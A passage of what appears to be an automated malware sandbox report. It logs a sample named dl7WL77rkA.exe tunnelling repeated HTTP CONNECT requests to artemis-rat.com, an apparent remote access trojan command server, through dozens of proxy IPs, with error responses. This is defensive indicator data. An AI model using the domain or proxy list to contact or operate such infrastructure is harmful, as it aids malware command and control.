                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            648192.168.2.551951104.17.215.222803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.207236052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.361737013 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            649192.168.2.551849202.40.181.220312473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.242360115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.186062098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            650192.168.2.55195972.167.221.188499133876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.242896080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.686073065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.202819109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.202280998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.201982975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            651192.168.2.551952138.68.60.831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.244553089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.849622011 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            652192.168.2.550946103.194.88.107326503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.244905949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.887582064 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 700
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Thu, 07 Mar 2024 07:04:45 GMT
                                                                                                                                                                                                                                                            Expires: Thu, 07 Mar 2024 07:04:45 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            653192.168.2.551939162.214.227.68455403876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.246021032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.732971907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.311415911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            654192.168.2.55187472.206.181.12341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.248585939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            655192.168.2.55187672.195.34.5841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.249469042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            656192.168.2.55111551.89.21.99643153876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.249469995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355070114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            657192.168.2.551245107.180.90.88631003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.249954939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.389441967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            658192.168.2.55187798.175.31.19541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.251539946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            659192.168.2.551878184.185.2.1241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.254579067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            660192.168.2.551970104.16.109.213803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.255039930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.410424948 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            661192.168.2.55190072.210.252.134461643876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.255409956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            662192.168.2.55120098.170.57.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.256594896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            663192.168.2.551941132.148.167.243482983876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.257617950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            664192.168.2.551315132.148.16.169556103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.258696079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355124950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405555010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.508852005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            665192.168.2.551916162.214.121.1129933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.259730101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.748610020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.514410973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806396008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            666192.168.2.551979172.67.181.12803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.259859085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.415175915 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            667192.168.2.551990104.20.123.164803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.267209053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.421799898 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            668192.168.2.551880192.252.216.8141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.267380953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            669192.168.2.551995104.17.132.79803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.268058062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
